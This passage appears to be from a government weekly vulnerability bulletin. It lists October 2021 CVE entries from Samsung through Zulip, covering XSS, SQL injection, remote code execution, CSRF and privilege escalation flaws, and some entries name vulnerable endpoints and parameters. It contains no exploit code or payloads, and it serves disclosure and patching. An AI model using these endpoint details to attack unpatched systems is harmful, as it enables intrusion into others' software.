A lack of replay attack protection in Security Mode Command process prior to SMR Oct-2021 Release 1 can lead to denial of service on mobile network connection and battery depletion.2021-10-06not yet calculatedCVE-2021-25471
MISC
samsung -- systemui
 
Assuming a shell privilege is gained, an improper exception handling for multi_sim_bar_hide_by_meadia_full value in SystemUI prior to SMR Oct-2021 Release 1 allows an attacker to cause a permanent denial of service in user device before factory reset.2021-10-06not yet calculatedCVE-2021-25473
MISC
samsung -- systemui
 
Assuming a shell privilege is gained, an improper exception handling for multi_sim_bar_show_on_qspanel value in SystemUI prior to SMR Oct-2021 Release 1 allows an attacker to cause a permanent denial of service in user device before factory reset.2021-10-06not yet calculatedCVE-2021-25474
MISC
samsung -- teegris_secure_os
 
An improper caller check logic of SMC call in TEEGRIS secure OS prior to SMR Oct-2021 Release 1 can be used to compromise TEE.2021-10-06not yet calculatedCVE-2021-25470
MISC
samsung -- vision_dsp_kernel_driver
 
Assuming system privilege is gained, possible buffer overflow vulnerabilities in the Vision DSP kernel driver prior to SMR Oct-2021 Release 1 allows privilege escalation to Root by hijacking loaded library.2021-10-06not yet calculatedCVE-2021-25467
MISC
samsung -- widevine_ta
 
An information disclosure vulnerability in Widevine TA log prior to SMR Oct-2021 Release 1 allows attackers to bypass the ASLR protection mechanism in TEE.2021-10-06not yet calculatedCVE-2021-25476
MISC
samsung -- widevine_trustlet
 
A possible guessing and confirming a byte memory vulnerability in Widevine trustlet prior to SMR Oct-2021 Release 1 allows attackers to read arbitrary memory address.2021-10-06not yet calculatedCVE-2021-25468
MISC
samsung -- widevine_trustlet
 
A possible stack-based buffer overflow vulnerability in Widevine trustlet prior to SMR Oct-2021 Release 1 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25469
MISC
scrapy -- scrapy
 
Scrapy is a high-level web crawling and scraping framework for Python. If you use `HttpAuthMiddleware` (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or as requests reached through redirects. Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials. If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead. If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the `w3lib.http.basic_auth_header` function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using `HttpAuthMiddleware`.2021-10-06not yet calculatedCVE-2021-41125
MISC
MISC
CONFIRM
MISC
scrapy-splash -- scrapy-splash
 
Scrapy-splash is a library which provides Scrapy and JavaScript integration. In affected versions users who use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for Splash authentication will have any non-Splash request expose your credentials to the request target. This includes `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`. Upgrade to scrapy-splash 0.8.0 and use the new `SPLASH_USER` and `SPLASH_PASS` settings instead to set your Splash authentication credentials safely. If you cannot upgrade, set your Splash request credentials on a per-request basis, [using the `splash_headers` request parameter](https://github.com/scrapy-plugins/scrapy-splash/tree/0.8.x#http-basic-auth), instead of defining them globally using the [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth). Alternatively, make sure all your requests go through Splash. That includes disabling the [robots.txt middleware](https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#topics-dlmw-robots).2021-10-05not yet calculatedCVE-2021-41124
MISC
CONFIRM
silverstripe -- silverstripe
 
Default SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1 permission checker not inherited by query subclass.2021-10-07not yet calculatedCVE-2021-28661
MISC
MISC
silverstripe -- silverstripe_framework
 
SilverStripe Framework through 4.8.1 allows XSS.2021-10-07not yet calculatedCVE-2021-36150
MISC
MISC
sophos -- hitmanpro
 
A local attacker could read or write arbitrary files with administrator privileges in HitmanPro before version Build 318.2021-10-08not yet calculatedCVE-2021-25271
CONFIRM
sophos -- hitmanpro.alert
 
A local attacker could execute arbitrary code with administrator privileges in HitmanPro.Alert before version Build 901.2021-10-08not yet calculatedCVE-2021-25270
CONFIRM
suitecrm -- suitecrm
 
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the importFile parameter of the RefreshMapping import functionality.2021-10-04not yet calculatedCVE-2021-41596
CONFIRM
CONFIRM
MISC
MISC
MISC
suitecrm -- suitecrm
 
SuiteCRM 7.10.x before 7.10.33 and 7.11.x before 7.11.22 is vulnerable to privilege escalation.2021-10-04not yet calculatedCVE-2021-41869
MISC
MISC
MISC
MISC
MISC
suitecrm -- suitecrm
 
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the file_name parameter of the Step3 import functionality.2021-10-04not yet calculatedCVE-2021-41595
MISC
CONFIRM
CONFIRM
MISC
sylius -- sylius/paypalplugin
 
sylius/paypal-plugin is a paypal plugin for the Sylius development platform. In affected versions the URL to the payment page done after checkout was created with autoincremented payment id (/pay-with-paypal/{id}) and therefore it was easy to predict. The problem is that the Credit card form has prefilled "credit card holder" field with the Customer's first and last name and hence this can lead to personally identifiable information exposure. Additionally, the mentioned form did not require authentication. The problem has been patched in Sylius/PayPalPlugin 1.2.4 and 1.3.1. If users are unable to update they can override a sylius_paypal_plugin_pay_with_paypal_form route and change its URL parameters to (for example) {orderToken}/{paymentId}, then override the Sylius\PayPalPlugin\Controller\PayWithPayPalFormAction service, to operate on the payment taken from the repository by these 2 values. It would also require usage of custom repository method. Additionally, one could override the @SyliusPayPalPlugin/payWithPaypal.html.twig template, to add contingencies: ['SCA_ALWAYS'] line in hostedFields.submit(...) function call (line 421). It would then have to be handled in the function callback.2021-10-05not yet calculatedCVE-2021-41120
MISC
MISC
CONFIRM
tad_book3 -- tad_book3
 
Tad Book3 editing book function does not filter special characters. Unauthenticated attackers can remotely inject JavaScript syntax and execute stored XSS attacks.2021-10-08not yet calculatedCVE-2021-41563
MISC
tad_book3 -- tad_book3
 
Tad Book3 editing book page does not perform identity verification. Remote attackers can use the vulnerability to view and modify arbitrary content of books without permission.2021-10-08not yet calculatedCVE-2021-41974
MISC
tad_honor -- tad_honor
 
Tad Honor viewing book list function is vulnerable to authorization bypass, thus remote attackers can use special parameters to delete articles arbitrarily without logging in.2021-10-08not yet calculatedCVE-2021-41564
MISC
tad_uploader -- tad_uploader
 
The new add subject parameter of Tad Uploader view book list function fails to filter special characters. Unauthenticated attackers can remotely inject JavaScript syntax and execute stored XSS attacks.2021-10-08not yet calculatedCVE-2021-41567
MISC
tad_uploader -- tad_uploader
 
Tad Uploader edit book list function is vulnerable to authorization bypass, thus remote attackers can use the function to amend the folder names in the book list without logging in.2021-10-08not yet calculatedCVE-2021-41976
MISC
tad_web -- tad_web
 
Tad Web is vulnerable to authorization bypass, thus remote attackers can exploit the vulnerability to use the original function of viewing bulletin boards and uploading files in the system.2021-10-08not yet calculatedCVE-2021-41568
MISC
tadtools -- tadtools
 
TadTools special page parameter does not properly restrict the input of specific characters, thus remote attackers can inject JavaScript syntax without logging in, and further perform reflective XSS attacks.2021-10-08not yet calculatedCVE-2021-41565
MISC
tadtools -- tadtools
 
The file extension of the TadTools file upload function fails to filter, thus remote attackers can upload any types of files and execute arbitrary code without logging in.2021-10-08not yet calculatedCVE-2021-41566
MISC
tadtools -- tadtools
 
TadTools special page is vulnerable to authorization bypass, thus remote attackers can use the specific parameter to delete arbitrary files in the system without logging in.2021-10-08not yet calculatedCVE-2021-41975
MISC
teddy -- teddy
 
This affects the package teddy before 0.5.9. A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string).2021-10-07not yet calculatedCVE-2021-23447
MISC
MISC
MISC
thinkphp50-cms -- thinkphp50-cms
 
ThinkPHP50-CMS v1.0 contains a remote code execution (RCE) vulnerability in the component /public/?s=captcha.2021-10-07not yet calculatedCVE-2020-21865
MISC
tracker -- ardour
 
Ardour v5.12 contains a use-after-free vulnerability in the component ardour/libs/pbd/xml++.cc when using xmlFreeDoc and xmlXPathFreeContext.2021-10-08not yet calculatedCVE-2020-22617
MISC
MISC
trend_micro -- multiple_products
 
An arbitrary file creation by privilege escalation vulnerability in Trend Micro Apex One, Apex One as a Service, Worry-Free Business Security 10.0 SP1, and Worry-Free Business Security Services could allow a local attacker to create an arbitrary file with higher privileges that could lead to a denial-of-service (DoS) on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.2021-10-06not yet calculatedCVE-2021-3848
MISC
verint -- workforce_optimization
 
Verint Workforce Optimization (WFO) 15.2.5.1033 allows HTML injection via the /wfo/control/signin username parameter.2021-10-08not yet calculatedCVE-2021-41825
MISC
MISC
visual_tools -- dvr_vx16
 
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py Uaer-Agent HTTP header.2021-10-07not yet calculatedCVE-2021-42071
MISC
MISC
vitec -- exterity_iptv_products
 
VITEC Exterity IPTV products through 2021-04-30 allow privilege escalation to root.2021-10-08not yet calculatedCVE-2021-42109
MISC
MISC
vyperlang -- vyper
 
Vyper is a Pythonic Smart Contract Language for the EVM. In affected versions external functions did not properly validate the bounds of decimal arguments. The can lead to logic errors. This issue has been resolved in version 0.3.0.2021-10-05not yet calculatedCVE-2021-41122
CONFIRM
MISC
vyperlang -- vyper
 
Vyper is a Pythonic Smart Contract Language for the EVM. In affected versions when performing a function call inside a literal struct, there is a memory corruption issue that occurs because of an incorrect pointer to the the top of the stack. This issue has been resolved in version 0.3.0.2021-10-06not yet calculatedCVE-2021-41121
CONFIRM
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?m=Config&a=add.2021-10-05not yet calculatedCVE-2020-21506
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?&m=Public&a=login.2021-10-05not yet calculatedCVE-2020-21504
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php/Link/addsave.2021-10-05not yet calculatedCVE-2020-21505
MISC
waimai -- waimai_super_cms
 
waimai Super Cms 20150505 has a logic flaw allowing attackers to modify a price, before form submission, by observing data in a packet capture. By setting the index.php?m=gift&a=addsave credit parameter to -1, the product is sold for free.2021-10-05not yet calculatedCVE-2020-21503
MISC
wdja -- wdja
 
WDJA CMS v1.5.2 contains an arbitrary file deletion vulnerability in the component admin/cache/manage.php.2021-10-06not yet calculatedCVE-2020-21648
MISC
wdja -- wdja
 
A Cross-Site Request Forgery (CSRF) in WDJA CMS v1.5.2 allows attackers to arbitrarily add administrator accounts via a crafted URL.2021-10-06not yet calculatedCVE-2020-21658
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an authenticated user to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the platform users and administrators. The issue affects every endpoint on the application because it is related on how each URL is echoed back on every response page.2021-10-08not yet calculatedCVE-2021-41918
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an unauthenticated user to perform Time and Boolean-based blind SQL Injection on the endpoint /includes/library.php, via the sor_cible, sor_champs, and sor_ordre HTTP POST parameters. This allows an attacker to access all the data in the database and obtain access to the webTareas application.2021-10-08not yet calculatedCVE-2021-41920
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an authenticated user to arbitrarily upload potentially dangerous files without restrictions. This is working by adding or replacing a personal profile picture. The affected endpoint is /includes/upload.php on the HTTP POST data. This allows an attacker to exploit the platform by injecting code or malware and, under certain conditions, to execute code on remote user browsers.2021-10-08not yet calculatedCVE-2021-41919
MISC
webtareas -- webtareas
 
A Cross-Site Request Forgery (CSRF) vulnerability in webTareas version 2.4 and earlier allows a remote attacker to create a new administrative profile and add a new user to the new profile. without the victim's knowledge, by enticing an authenticated admin user to visit an attacker's web page.2021-10-08not yet calculatedCVE-2021-41916
MISC
webtareas -- webtareas
 
webTareas version 2.4 and earlier allows an authenticated user to store arbitrary web script or HTML by creating or editing a client name in the clients section, due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the platform users and administrators. The affected endpoint is /clients/editclient.php, on the HTTP POST cn parameter.2021-10-08not yet calculatedCVE-2021-41917
MISC
wire -- wire
 
Wire is an open source secure messenger. In affected versions if the an attacker gets an old but valid access token they can take over an account by changing the email. This issue has been resolved in version 3.86 which uses a new endpoint which additionally requires an authentication cookie. See wire-ios-sync-engine and wire-ios-transport references. This is the root advisory that pulls the changes together.2021-10-04not yet calculatedCVE-2021-41093
MISC
MISC
MISC
MISC
CONFIRM
wire -- wire
 
Wire is an open source secure messenger. Users of Wire by Bund may bypass the mandatory encryption at rest feature by simply disabling their device passcode. Upon launching, the app will attempt to enable encryption at rest by generating encryption keys via the Secure Enclave, however it will fail silently if no device passcode is set. The user has no indication that encryption at rest is not active since the feature is hidden to them. This issue has been resolved in version 3.702021-10-04not yet calculatedCVE-2021-41094
MISC
CONFIRM
wire-server -- wire-server
 
Wire-server is the backing server for the open source wire secure messaging application. In affected versions it is possible to trigger email address change of a user with only the short-lived session token in the `Authorization` header. As the short-lived token is only meant as means of authentication by the client for less critical requests to the backend, the ability to change the email address with a short-lived token constitutes a privilege escalation attack. Since the attacker can change the password after setting the email address to one that they control, changing the email address can result in an account takeover by the attacker. Short-lived tokens can be requested from the backend by Wire clients using the long lived tokens, after which the long lived tokens can be stored securely, for example on the devices key chain. The short lived tokens can then be used to authenticate the client towards the backend for frequently performed actions such as sending and receiving messages. While short-lived tokens should not be available to an attacker per-se, they are used more often and in the shape of an HTTP header, increasing the risk of exposure to an attacker relative to the long-lived tokens, which are stored and transmitted in cookies. If you are running an on-prem instance and provision all users with SCIM, you are not affected by this issue (changing email is blocked for SCIM users). SAML single-sign-on is unaffected by this issue, and behaves identically before and after this update. The reason is that the email address used as SAML NameID is stored in a different location in the databse from the one used to contact the user outside wire. Version 2021-08-16 and later provide a new end-point that requires both the long-lived client cookie and `Authorization` header. The old end-point has been removed. If you are running an on-prem instance with at least some of the users invited or provisioned via SAML SSO and you cannot update then you can block `/self/email` on nginz (or in any other proxies or firewalls you may have set up). You don't need to discriminate by verb: `/self/email` only accepts `PUT` and `DELETE`, and `DELETE` is almost never used.2021-10-04not yet calculatedCVE-2021-41100
CONFIRM
wordpress -- wordpressThe FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.2021-10-06not yet calculatedCVE-2021-39350
MISC
MISC
wordpress -- wordpressThe WP Bannerize WordPress plugin is vulnerable to authenticated SQL injection via the id parameter found in the ~/Classes/wpBannerizeAdmin.php file which allows attackers to exfiltrate sensitive information from vulnerable sites. This issue affects versions 2.0.0 - 4.0.2.2021-10-06not yet calculatedCVE-2021-39351
MISC
MISC
wordpress -- wordpress
 
The Stripe for WooCommerce WordPress plugin is missing a capability check on the save() function found in the ~/includes/admin/class-wc-stripe-admin-user-edit.php file that makes it possible for attackers to configure their account to use other site users unique STRIPE identifier and make purchases with their payment accounts. This affects versions 3.0.0 - 3.3.9.2021-10-04not yet calculatedCVE-2021-39347
MISC
MISC
xen -- certain_pci_devices
 
PCI devices with RMRRs not deassigned correctly Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR"). These are typically used for platform tasks such as legacy USB emulation. If such a device is passed through to a guest, then on guest shutdown the device is not properly deassigned. The IOMMU configuration for these devices which are not properly deassigned ends up pointing to a freed data structure, including the IO Pagetables. Subsequent DMA or interrupts from the device will have unpredictable behaviour, ranging from IOMMU faults to memory corruption.2021-10-06not yet calculatedCVE-2021-28702
MISC
MLIST
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component install\install.sql of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via changing the doctype value to 0.2021-10-04not yet calculatedCVE-2020-21494
MISC
MISC
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitename parameter.2021-10-04not yet calculatedCVE-2020-21495
MISC
MISC
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitebrief parameter.2021-10-04not yet calculatedCVE-2020-21496
MISC
MISC
xiuno -- xiuno_bbs
 
An issue in the component route\user.php of Xiuno BBS v4.0.4 allows attackers to enumerate usernames.2021-10-04not yet calculatedCVE-2020-21493
MISC
MISC
xyhcms -- xyhcms
 
XYHCMS v3.6 contains a stored cross-site scripting (XSS) vulnerability in the component xyhai.php?s=/Link/index.2021-10-06not yet calculatedCVE-2020-21656
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. Stored XSS may occur via an Article during addition of an attachment to a Ticket.2021-10-07not yet calculatedCVE-2021-42092
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. SSRF can occur via GitHub or GitLab integration.2021-10-07not yet calculatedCVE-2021-42091
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The Form functionality allows remote code execution because deserialization is mishandled.2021-10-07not yet calculatedCVE-2021-42090
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The REST API discloses sensitive information.2021-10-07not yet calculatedCVE-2021-42089
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The Chat functionality allows XSS because clipboard data is mishandled.2021-10-07not yet calculatedCVE-2021-42088
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An admin can discover the application secret via the API.2021-10-07not yet calculatedCVE-2021-42087
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An Agent account can modify account data, and gain admin access, via a crafted request.2021-10-07not yet calculatedCVE-2021-42086
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. There is stored XSS via a custom Avatar.2021-10-07not yet calculatedCVE-2021-42085
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An attacker with valid agent credentials may send a series of crafted requests that cause an endless loop and thus cause denial of service.2021-10-07not yet calculatedCVE-2021-42084
MISC
zammad -- zammad
 
An issue was discovered in Zammad before 4.1.1. An admin can execute code on the server via a crafted request that manipulates triggers.2021-10-07not yet calculatedCVE-2021-42093
MISC
zammad -- zammad
 
An issue was discovered in Zammad before 4.1.1. Command Injection can occur via custom Packages.2021-10-07not yet calculatedCVE-2021-42094
MISC
zehpyr_project-rtos -- zephyr
 
Buffer Access with Incorrect Length Value in zephyr. Zephyr versions >= >=2.5.0 contain Buffer Access with Incorrect Length Value (CWE-805). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8q65-5gqf-fmw52021-10-05not yet calculatedCVE-2021-3581
MISC
zehpyr_project-rtos -- zephyr_json_decoder
 
Zephyr JSON decoder incorrectly decodes array of array. Zephyr versions >= >1.14.0, >= >2.5.0 contain Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-289f-7mw3-2qf42021-10-05not yet calculatedCVE-2021-3510
MISC
zephyrproject-rtos -- zephyr
 
Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f3632021-10-05not yet calculatedCVE-2021-3625
MISC
zephyrproject-rtos -- zephyr
 
BT: Possible to overwrite an existing bond during keys distribution phase when the identity address of the bond is known. Zephyr versions >= 1.14.2, >= 2.4.0, >= 2.5.0 contain Use of Multiple Resources with Duplicate Identifier (CWE-694). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-j76f-35mc-4h632021-10-05not yet calculatedCVE-2021-3436
MISC
zephyrproject-rtos -- zephyr
 
DOS: Incorrect 802154 Frame Validation for Omitted Source / Dest Addresses. Zephyr versions >= > v2.4.0 contain NULL Pointer Dereference (CWE-476), Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94jg-2p6q-53642021-10-05not yet calculatedCVE-2021-3319
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37930
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37931
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37921
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior is vulnerable to path traversal which allows copying of files from one directory to another.2021-10-07not yet calculatedCVE-2021-37922
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37923
MISC
MISC

zoho -- manageengine_admanager_plus

Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37918
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37924
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37926
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37928
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37929
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37920
MISC
MISC
zoho -- manageengine_admanager_plus
 
Zoho ManageEngine ADManager Plus before 7110 is vulnerable to blind XXE.2021-10-07not yet calculatedCVE-2021-38298
CONFIRM

zoho -- manageengine_admanager_plus
 

Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37919
MISC
MISC
zoho -- manageengine_admanager_plus
 
Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file overwrite leading to remote code execution.2021-10-07not yet calculatedCVE-2021-37762
MISC
MISC
zoho -- zoho
 
A Cross-Site Scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user’s browser while the browser is connected to a trusted website. The attack targets your application's users and not the application itself while using your application as the attack's vehicle. The XSS payload executes whenever the user changes the form values or deletes a created form in Zoho CRM Lead Magnet Version 1.7.2.4.2021-10-05not yet calculatedCVE-2021-33849
MISC
MISC
zulip -- zulip
 
Zulip is an open source team chat server. In affected versions Zulip allows organization administrators on a server to configure "linkifiers" that automatically create links from messages that users send, detected via arbitrary regular expressions. Malicious organization administrators could subject the server to a denial-of-service via regular expression complexity attacks; most simply, by configuring a quadratic-time regular expression in a linkifier, and sending messages that exploited it. A regular expression attempted to parse the user-provided regexes to verify that they were safe from ReDoS -- this was both insufficient, as well as _itself_ subject to ReDoS if the organization administrator entered a sufficiently complex invalid regex. Affected users should [upgrade to the just-released Zulip 4.7](https://zulip.readthedocs.io/en/latest/production/upgrade-or-modify.html#upgrading-to-a-release), or [`main`](https://zulip.readthedocs.io/en/latest/production/upgrade-or-modify.html#upgrading-from-a-git-repository).2021-10-07not yet calculatedCVE-2021-41115
CONFIRM
MISC
MISC

Back to top

Please share your thoughts

We recently updated our anonymous product survey; we’d welcome your feedback.